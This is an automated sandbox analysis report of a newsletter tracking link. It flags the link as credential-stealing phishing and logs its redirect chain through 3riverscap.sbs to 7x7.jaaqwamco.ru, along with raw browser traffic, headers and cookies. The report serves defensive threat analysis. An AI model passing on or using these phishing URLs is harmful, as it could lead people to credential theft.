Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2F

Overview

General Information

Sample URL:https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0l
Analysis ID:1563345
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1976,i,15468630849517401566,4594453010131145192,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2BbSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425HTTP Parser: Base64 decoded: 1732650870.000000
Source: https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425HTTP Parser: No favicon
Source: https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425HTTP Parser: No favicon
Source: https://7x7.jaaqwamco.ru/Sb3OEcu/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 20.190.147.3:443 -> 192.168.2.16:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: link.mail.beehiiv.com to https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.3
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nn06uqL9aDK8kM6eCNzsKa.ZVNrBgAv5KX5V4Svt4R8-1732650866-1.0.1.1-nWDNpfPukp8t8U0XFkkIAj0j7p5WW9fgVwzq3cHy9wmKlscKJQMB_DomaOKAfARkRgyPZoMqw9mfA8YJihA2dg
Source: global trafficHTTP traffic detected: GET /?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425 HTTP/1.1Host: 3riverscap.sbsConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: 3riverscap.sbsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=s8KFDPC2G8SYPmy&MD=l5dLo5zL HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425 HTTP/1.1Host: 3riverscap.sbsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8; ytb85vtlLNEaqVL6bVF11vMjOx0=1732650872; cOiOxvrWexZRQxekKrp9NKmvZuY=1732737272; fDN0wTGJWkBMHpJQE2V96znAEWI=1C-4GTPbBUrQHKBauwyqV8q1W54
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js? HTTP/1.1Host: 3riverscap.sbsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js? HTTP/1.1Host: 3riverscap.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8; ytb85vtlLNEaqVL6bVF11vMjOx0=1732650872; cOiOxvrWexZRQxekKrp9NKmvZuY=1732737272; fDN0wTGJWkBMHpJQE2V96znAEWI=1C-4GTPbBUrQHKBauwyqV8q1W54
Source: global trafficHTTP traffic detected: GET /Sb3OEcu/ HTTP/1.1Host: 7x7.jaaqwamco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3riverscap.sbs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/8e8c6e58cb1b43b2 HTTP/1.1Host: 3riverscap.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8; ytb85vtlLNEaqVL6bVF11vMjOx0=1732650872; cOiOxvrWexZRQxekKrp9NKmvZuY=1732737272; fDN0wTGJWkBMHpJQE2V96znAEWI=1C-4GTPbBUrQHKBauwyqV8q1W54
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://7x7.jaaqwamco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://7x7.jaaqwamco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://7x7.jaaqwamco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://7x7.jaaqwamco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://7x7.jaaqwamco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
